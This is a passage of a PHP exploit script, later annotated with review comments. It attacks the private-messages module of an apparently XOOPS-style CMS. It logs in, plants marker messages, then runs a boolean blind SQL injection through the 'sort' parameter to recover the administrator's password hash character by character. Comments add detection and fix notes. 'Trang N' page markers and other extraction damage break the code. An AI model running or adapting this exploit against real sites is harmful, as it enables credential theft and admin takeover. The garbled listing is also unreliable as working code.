while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
// Positional arguments: target host, application path, and the username/password of an
// existing account; the login request further down sends them.
// NOTE(review): nothing checks that argv[1]..argv[4] were actually supplied.
$host=$argv[1];
$path=$argv[2];
$uname=$argv[3];
$pass=$argv[4];
// Defaults for the optional switches parsed below.
$prefix="exv2_"; // database table prefix, spliced into the SQL string later in the script
$port=80;
$proxy="";
// Optional switches start at argv[5]; the value is glued directly onto the switch.
for ($i=5; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1]; // first two characters identify the switch
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]); // -p<port>
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]); // -P<proxy>
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]); // -T<table prefix>
}
}
// Request-target prefix used by every request below: the bare path when no proxy is set,
// otherwise an absolute http://host:port/path URL. $proxy and $port are presumably also
// consumed by sendpacketii(), whose body is mostly outside this part of the listing.
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
// Step 1 - log in as the supplied account. A raw HTTP/1.0 POST to user.php is assembled
// by hand; $uname and $pass go into the form body without URL-encoding.
// For defenders: every request in this script carries the same fixed MSIE 6.0 User-Agent,
// HTTP/1.0 and "Connection: Close", which makes the traffic easy to fingerprint in logs.
// NOTE(review): "Trang 2" a few lines down is a page marker from the paged document this
// listing was extracted from, not PHP; the listing does not parse as printed.
$data="uname=$uname&pass=$pass&op=login";
$packet ="POST ".$p."user.php HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
Trang 2$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
// sendpacketii() is defined above this part of the listing; the code below reads the
// response from $html afterwards, so the helper presumably fills that variable as a global.
sendpacketii($packet);
// Collect the session cookies: split the response on "Set-Cookie: ", keep each value up
// to the first space / carriage return, make sure it ends in ";" and concatenate them.
$temp=explode("Set-Cookie: ",$html);
$cookie="";
for ($i=1; $i<count($temp); $i++)
{
$temp2=explode(" ",$temp[$i]);
$temp3=explode("\r",$temp2[0]);
if (!strstr($temp3[0],";")){$temp3[0]=$temp3[0].";";}
$cookie.=$temp3[0];
}
echo "cookie ->".$cookie."\n";
// Step 2 - look up the numeric user id of the logged-in account: fetch edituser.php with
// the session cookie and read the number that follows "userinfo.php?uid=" in the page.
$packet ="GET ".$p."edituser.php HTTP/1.0\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
// NOTE(review): $temp[1] is read without checking that the marker was found; if the login
// failed, the (int) cast of the missing value yields 0.
$temp=explode("userinfo.php?uid=",$html);
$temp2=explode("'",$temp[1]); // the id ends at the next single quote
$uid=(int)$temp2[0];
echo "uid -> ".$uid."\n";
// Step 3 - save a message-box configuration for the account (op=config_save with all
// msg_* options set to 0); the original author marks this step as required.
// NOTE(review): "Trang 3" below is a page marker from the paged document this listing was
// extracted from, not PHP; the listing does not parse as printed.
$data ="msg_mail=0";
$data.="&msg_showdisc=0";
$data.="&msg_showsend=0";
$data.="&update=0";
$data.="&op=config_save";
Trang 3$data.="&submit=Save";
$packet ="POST ".$p."modules/messages/conf.php HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1); // short pause before the next request
// Step 4 - the account sends private messages to its own user id ($uid) through
// modules/messages/pmlite.php. Each subject is a run of "1" characters followed by the
// loop counter; the extraction step later in the script searches responses for such a
// run, so these messages presumably serve as the rows whose listing it observes.
// NOTE(review): this listing was extracted from a paged document; page markers
// ("Trang N") and other extraction damage fall inside this block, including inside the
// string literal, so it does not parse or behave as printed.
for ($i=2; $i>=1; $i )
{
// Hand-written multipart/form-data body; the boundary string is fixed.
$data=' -7d626f251b00fa
Content-Disposition: form-data; name="to_userid"
'.$uid.'
-7d626f251b00fa
Content-Disposition: form-data; name="subject"
11111111111111111111111'.$i.'
-7d626f251b00fa
Content-Disposition: form-data; name="message"
11111111111111111111111
-7d626f251b00fa
Content-Disposition: form-data; name="MAX_FILE_SIZE"
256000
-7d626f251b00fa
Content-Disposition: form-data; name="msg_attachment"; filename=""
-7d626f251b00fa
Content-Disposition: form-data; name="msg_attachment[max_file_size]"
Trang 4256000
-7d626f251b00fa
Content-Disposition: form-data; name="msg_attachment[accepted]"
-7d626f251b00fa
Content-Disposition: form-data; name="allow_html"
1
-7d626f251b00fa
Content-Disposition: form-data; name="allow_smileys"
1
-7d626f251b00fa
Content-Disposition: form-data; name="allow_bbcode"
1
-7d626f251b00fa
Content-Disposition: form-data; name="submit"
Envoyer
-7d626f251b00fa
';
$packet="POST ".$p."modules/messages/pmlite.php HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data;
boundary= -7d626f251b00fa\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: $cookie\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(2); // pause between the two submissions
}
// Step 5 - boolean-based blind SQL injection through the `sort` parameter of
// modules/messages/index.php, recovering the `pass` column one character at a time.
// NOTE(review): "Trang 5" on the next line is a page marker from the paged document this
// listing was extracted from; the listing carries further extraction damage and does not
// parse as printed.
Trang 5//let's go
// Candidate character codes per position: 0 (the end-of-string sentinel), the digits 0-9
// and the letters a-f, i.e. the alphabet of a lowercase hex digest. The variable name
// suggests an MD5 hash - TODO confirm against the application's schema.
$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1; // 1-based position inside `pass` currently being tested
$my_password="";
// One outer iteration per character position; stops once the recovered string holds chr(0).
while (!strstr($my_password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s)) // only codes from the candidate set trigger a request
{
// The injected value is a subquery whose IF() picks msg_time or subject depending on
// whether character $j of `pass` equals code $i, for the row of <prefix>users with
// rank=7 and level=5 (presumably the administrator account - not shown here).
// For defenders: this relies on index.php placing `sort` into the query's ordering
// clause without validation (server code is not part of this listing); the remedy is to
// accept only an allow-list of sortable column names. In access logs the probe shows as
// a long burst of near-identical GETs from one session, with SELECT/IF/ASCII/SUBSTRING
// and /**/ sequences inside `sort` and the constant by=suntzu.
$sql="(SELECT(IF((ASCII(SUBSTRING(pass,$j,1))=".$i."),msg_time,subject))F ROM/**/".$prefix."users/**/WHERE/**/rank=7/**/and/**/level=5)/**/ASC/**/L IMIT/**/1/*";
echo "sql -> ".$sql."\r\n";
$sql=urlencode($sql);
$packet ="GET ".$p."modules/messages/index.php?sort=$sql&by=suntzu
HTTP/1.0\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
// A response that lacks the marker run of "1" characters is taken as a match for code
// $i: the character is appended, progress is printed, and the inner loop ends.
if
(!strstr($html,"111111111111111111111111")){$my_password.=chr($i);echo
"password -> ".$my_password."[???]\n";sleep(1);break;}
}
// Reaching code 255 without a match means no candidate fitted this position: abort.
if ($i==255) {die("Exploit failed ");}
}
$j++; // advance to the next character position
}
$j=1;
$my_admin="";
while (!strstr($my_admin,chr(0)))